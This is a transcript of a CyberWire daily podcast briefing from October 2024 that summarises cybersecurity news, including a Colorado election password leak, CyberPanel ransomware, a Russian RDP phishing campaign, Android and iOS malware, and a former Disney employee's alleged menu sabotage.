Password snafu sparks election security questions.

Colorado election officials downplay a partial password leak. Over 22,000 CyberPanel instances were targeted in a ransomware attack. Google issues a critical security update for Chrome. Microsoft says Russia’s SVR is conducting a wide-ranging phishing campaign. The FakeCall Android banking trojan gains advanced evasion and espionage capabilities. A New 0patch Fix Blocks Malicious Theme Files. iOS malware LightSpy adds destructive features. LinkedIn faces class-action lawsuits over alleged privacy violations. The U.S. charges a Russian national as part of Operation Magnus. On this week’s CertByte segment, Chris Hare is joined by Dan Neville to break down a question targeting the Certified Associate in Project Management (CAPM)® certification. An Ex-Disney Staffer Allegedly Adds a Side of Sabotage to Park Menus.

Today is Wednesday October 30th 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Colorado election officials downplay a partial password leak. 

A partial password leak for Colorado election machines, discovered on the state’s website, does not pose a threat to system security, according to the Colorado secretary of state’s office. The passwords, visible due to a spreadsheet tab error, have reportedly been accessible since August but require physical access to be usable. Colorado’s voting machines remain offline and secured in rooms with badge-restricted entry and 24/7 camera surveillance. Additionally, two separate passwords are required for each machine, held by different parties. The leak, highlighted by Colorado GOP official Hope Scheppelman, could fuel distrust or misinformation. However, cybersecurity expert Chris Krebs noted that robust security layers prevent any technical impact. The Cybersecurity and Infrastructure Security Agency (CISA) has been notified to monitor the situation. The breach echoes past election security concerns in Colorado, where former official Tina Peters was sentenced to nine years in federal prison over a 2020 voting machine breach.

Over 50 million Americans have already cast their ballots, while foreign interference efforts from Russia, China, and Iran have been largely contained, according to the Foundation for Defense of Democracies. Despite some influence campaigns, the U.S. is better prepared than in 2016, with real-time warnings and resources from agencies like CISA to counter disinformation. Additionally, authorities are investigating physical threats after ballot box fires in Oregon and Washington. Protections are in place to ensure impacted voters can recast their votes.

Over 22,000 CyberPanel instances were targeted in a ransomware attack. 

Over 22,000 CyberPanel instances were targeted in a ransomware attack exploiting a critical vulnerability, allowing remote code execution with root access. CyberPanel is an open-source web hosting control panel designed for managing websites and servers. The flaw, disclosed by researcher DreyAnd, involves three main issues: defective authentication, command injection, and security filter bypass, which together allow attackers to execute arbitrary commands on vulnerable servers. The PSAUX ransomware, which surfaced in June 2024, exploited these flaws, encrypting files on affected servers and leaving ransom notes.

LeakIX, a threat intelligence service, reported that almost half of the vulnerable servers were in the U.S., but their numbers quickly dropped as attackers took them offline. LeakIX has since released a decryptor for the ransomware, although users are urged to back up data before using it to avoid potential corruption. CyberPanel users are strongly advised to apply the latest security patch on GitHub immediately.

Google issues a critical security update for Chrome.

Google has issued a critical security update for Chrome. The update addresses two serious issues: a CVE-2024-10487 out-of-bounds write vulnerability in the Dawn graphics system, potentially enabling remote code execution, and a CVE-2024-10488 “use after free” flaw in WebRTC that could cause system crashes or breaches. Users are advised to update Chrome immediately to mitigate these risks.

Microsoft says Russia’s SVR is conducting a wide-ranging phishing campaign. 

Microsoft has reported that Russia’s SVR intelligence agency, via the Midnight Blizzard (APT29 or Cozy Bear) group, is conducting a wide-ranging phishing campaign targeting governments, NGOs, academia, and defense sectors. Unusual for this group, the campaign involves RDP configuration file attachments, which, when executed, link victims’ systems to attacker-controlled servers. This setup exposes local system resources like hard drives, peripherals, and even user credentials, enabling malware installation and continued remote access.

The phishing emails, often in Ukrainian, impersonate Microsoft and other tech providers to appear legitimate. This marks a shift for Midnight Blizzard, which typically conducts more targeted, stealthy attacks. Microsoft, CERT-UA, and Amazon have been tracking this campaign since its October 22 start, noting it may have been planned since August. Midnight Blizzard, responsible for previous breaches, including a major Microsoft system breach exposing US government emails, often seeks sensitive data for Russian intelligence.

The FakeCall Android banking trojan gains advanced evasion and espionage capabilities.

The FakeCall Android banking trojan, primarily targeting South Korea, has evolved with advanced evasion and espionage capabilities. Distributed via phishing to prompt users to download a malicious APK, FakeCall connects to a command-and-control (C2) server, allowing attackers to intercept calls and redirect users to fraudulent numbers posing as banks, where they request sensitive information. Recent research by Zimperium’s zLabs reveals increased complexity, including encrypted code, Bluetooth and screen state monitoring, and accessibility services enabling remote control over the device’s interface.

This upgrade allows FakeCall to manipulate the device by simulating screen interactions, uploading images, disabling Bluetooth, and setting itself as the default dialer. Researchers note the malware’s sophisticated techniques, resembling those in state-sponsored espionage, now enable attackers to create a “man-in-the-device” scenario, jeopardizing not only individuals but also organizations and governments lacking robust mobile protections.

A New 0patch Fix Blocks Malicious Theme Files. 

0patch [zero-patch] has released free micropatches for Windows users to address a vulnerability in theme files that can leak NTLM credentials simply by viewing a malicious theme file. Discovered during Microsoft’s patch for CVE-2024-38030, this vulnerability stems from Windows theme files pointing to network paths, inadvertently sending user credentials. While Microsoft’s patch for the related CVE-2024-21320 issue used the PathIsUNC function to block network paths, this was bypassed, prompting 0patch to create an additional fix.

The micropatch applies to both legacy and updated Windows Workstation versions, offering free protection until Microsoft releases an official patch. Notably, 0patch does not support Windows Server, where theme files require active application to pose a threat. 

iOS malware LightSpy adds destructive features. 

A recent iOS-targeted update to the LightSpy malware has expanded its plugin count from 12 to 28, adding destructive functions, according to ThreatFabric. Originally observed in 2020, LightSpy targeted Hong Kong iPhones, exploiting iOS vulnerabilities to access location, call history, messages, and passwords. The malware has since appeared in Android and macOS versions and recently targeted South Asia, likely India. The latest iOS variant, which affects devices up to iOS 13.3, includes plugins for data theft, device freezing, browser history wiping, file deletion, and Wi-Fi profile removal. The non-persistent jailbreak used by attackers allows reboots to clear the malware, though reinfection remains a risk. Evidence suggests a Chinese state-sponsored group may be behind LightSpy.

LinkedIn faces class-action lawsuits over alleged privacy violations. 

LinkedIn faces multiple class-action lawsuits in California, alleging privacy violations over its use of web tracking tools on medical websites. The lawsuits claim LinkedIn’s Insight Tag tracked users’ interactions on healthcare platforms, including sensitive data on medical bookings without consent. Plaintiffs include users of Spring Fertility, Therapymatch (Headway), and CityMD. Allegedly, LinkedIn intercepted highly personal information, including treatment types and patient sexual orientation. Co-defendants Meta and Spring Fertility are accused of collaborating in this data interception.

These lawsuits echo broader concerns over social media trackers on healthcare websites, as federal agencies like the FTC warn of potential HIPAA and privacy law violations. Meanwhile, privacy experts advise healthcare providers to avoid using tracking pixels on sensitive sites, given risks of re-identifying users and data exposure. Recently, LinkedIn also faced a €310 million GDPR fine in Ireland over similar privacy issues involving data tracking.

The U.S. charges a Russian national as part of Operation Magnus. 

The U.S. has charged Russian national Maxim Rudometov with creating and managing the Redline infostealer malware, used in millions of infections worldwide. Part of Operation Magnus, an international effort led by Dutch police, the case details years of FBI investigations that connected Rudometov’s online aliases and activities across IP addresses, emails, social media, and gaming profiles. The malware, sold as a malware-as-a-service, collects sensitive data like credentials and financial information from infected devices. The FBI traced Rudometov through logs from Redline’s licensing server, showing financial and IP links to his Yandex email, iCloud, and Binance accounts. Though he faces up to 35 years in prison, Rudometov remains at large in Russia, limiting immediate enforcement possibilities.

We’ve got our CertByte segment up next. N2K’s Chris Hare is joined by Dan Neville to break down a question from N2K's PMI® Certified Associate in Project Management (CAPM®) Practice Test.

We’ll be right back

Welcome back. You can find links in our show notes. 

 

An Ex-Disney Staffer Allegedly Adds a Side of Sabotage to Park Menus. 

And finally, in a tale of digital mischief gone too far, a former Disney worker, Michael Scheuer, allegedly hacked into Disney’s proprietary menu software after being let go. According to a federal complaint, Scheuer allegedly used old login credentials to access the menu system, sneaking in changes that included turning fonts to Wingdings, slipping profanity onto menus, and—most dangerously—mislabeling peanut-allergenic foods as “safe.” Thankfully, Disney caught the altered menus before they reached customers. But Scheuer didn’t stop there: he reportedly hijacked QR codes on outdoor menus to redirect to boycott websites, locked employees out of their accounts with endless login attempts, and even showed up at one ex-colleague’s home. The DOJ and Disney remain mum on the specifics, but Scheuer’s alleged antics are a reminder that grudges—and digital footprints—can lead to more than a slap on the wrist.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

 

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.